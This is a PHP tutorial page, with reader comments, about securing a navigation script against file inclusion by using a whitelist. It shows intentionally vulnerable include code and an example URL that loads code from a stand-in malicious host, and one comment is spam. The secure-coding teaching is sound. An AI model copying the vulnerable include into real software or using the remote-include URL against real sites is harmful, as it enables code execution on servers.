Scriptplayground Network

Scriptplayground Preview
AIR Beta 3 | Download Now

Flash and PHP Bible

The Flash and PHP Bible has been released! The book can be found on Amazon or wherever fine books are sold in your area. This book explains the process of working with PHP in Flash, while creating real world examples that you can actually learn something from.

The Flash and PHP Bible has a dedicated forum for support and comments.

Scriptplayground » tutorials » php » PHP Navigation

PHP Navigation

How to code and understand a more secure navigation script. I am sure you have seen other navigation scripts the difference is those scripts open a security hole on your site, an SSI (Server Side Include) Exploit to be exact.

Here is an example of the dangerous code

<?php

if(!isset($_GET["url"])) 
	{
	$url = "home";
	}
else 
	{
	include ($url . "php");
	}

?>

The above code is saying if the variable "url" is set, include the page or include the predefined page. Now it seems like this is pretty secure, but someone would be able to include a malicious file.

Here is an example url: www.your navscript.com/index.php?url=http://www.maliciouscodesite.com/badcode

This would include the malicious code and your site would append the "php" extension to the include link.

I am sure you can see the problems with this result?



Here is the more secure option

<?php
$default = "home.php";
$allowed = array (
	'index',
	'example',
); 
if( isset( $_POST["P"] ) || isset( $_GET["P"] ))
	{
	$page = isset($_GET["P"]) ? $_GET["P"] : $_POST["P"];
	
	if( in_array( trim ( $page ), $allowed ))
		{
		$file = $page . ".php";
		if( (file_exists( $file )))
			{
			include( $file );
			}
		else
			{
			include( $default );
			}
		}
	else
		{
		include( $default );
		}
	}
else
	{
	include( $default );
	}
?>



$default = "home.php";

The default page that is included.



$allowed = array (
	'index',
	'example',
);

This is the Array of allowed files, add as many as you need.



if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
	{

If the "P" variable is set then continue with script, if it is false then include the default page.



$page = isset($_GET["P"]) ? $_GET["P"] : $_POST["P"];

Checks to see if the "P" variable has a value. If it does that value is set to the "$page" variable.



if( in_array( trim ( $page ), $allowed ))
	{

Check to see whether or not the value set in "$page" is in the list of "$allowed" Array. The "trim" part removes extra spaces that might exist in the array.



$file = $page . ".php";

Sets the value of $file to the filename you are requesting and appends the ".php" extension.



if( (file_exists( $file )))
	{
	include( $file );
	}

If the file exists then include the file( "$file" ).



else
	{
	include( $default );
	}

If the file is in the Array, but the file is not found include the default file.



else
	{
	include( $default );
	}
}

If the file requested doesn't exist in the Array include the default file.



else
	{
	include( $default );
	}

If no request for a page is made include the default one.



That is the end of the script. Now you have created a more secure alternative for a site with PHP navigation. Just fill in the array with your files and you are ready to go. If you wanted to add to the script you could add a file type checker as well.

| Print It

Comments: PHP Navigation

 Stefan  Tue Jan 3, 2006 7:01 pm  
Awesome tutorial. I already knew this, but it's still good.
 p2p  Thu Jul 13, 2006 5:07 pm  
whr do i put this code? on navigation or on top of the page? or where? I am so confused with this php navigation thing... :mad
 Matthew Keefe  Thu Jul 13, 2006 5:12 pm  
You place this code at the top of the page where you would like the HTML to be loaded. You can also place it at any other point where you would want the page loaded. When I used this method I would have one PHP file that loads in a header and footer. Then between those I loaded this navigation script.
 php manual  Sat Jan 27, 2007 7:58 am  
good article,thanks
 abdullah  Thu Jan 31, 2008 6:40 pm  
Evinde, ev ortamında
2 saat boş vaktin varsa bu iş senin işin hiç masrafsız internetten para kazanmak artık çok kolay 7 ayda 480 ytl kazan internetten para kazanmak zamanı

 rick james  Tue Feb 5, 2008 9:03 pm  
Really clear and concise! Many thanks, keep up the good work.
 Robert Popplewell  Sun Mar 16, 2008 10:21 am  
In the line where you are filling the $page variable with POST or GET data:

$page = ( $_POST["P"] ) || isset( $_GET["P"] );

Should the isset function be used at this point? seeing as it only returns a TRUE or FALSE value.
 mkeefe  Sun Mar 16, 2008 2:07 pm  
@Robert, good point, it doesn't seem to be on the correct line. Actually, it is duplicated for some strange reason. it should simply be:

$page = isset($_GET["P"]) ? $_GET["P"] : $_POST["P"];

I will have that fixed right now.

Thanks,
Matt
 Bas  Mon Apr 14, 2008 7:53 am  
Whenever I make use of the querystring ($_GET["..."] ) I run it through a function that encrypts/decrypts it. Even though the encrypted querystring can still be tampered with, you will be an unguided missile without the alogrithm.
 mkeefe  Mon Apr 14, 2008 8:01 am  
@Bas, That is a good tip. Whenever possible it is a good idea to limit what goes across the url, as a good secondary, try using an ID that matches some database parameters or session variables.
Add a comment
Name:
Website:
Comment:
Please note: Offensive comments, flaming and spamming is not permitted on this site and your comment will be deleted immediately.

HTML is not allowed.

As a security measure your ip will be recorded. 		 
Anti-Robot Check:

Enter the key you see above.
What is this?: This extra test has been added due to the recent explosion of spam. 		 
Google
 

©2004 - 2008 scriptplayground | Privacy Policy | Legal
Validate Site: XHTML CSS | Designed by: mkeefeDESIGN |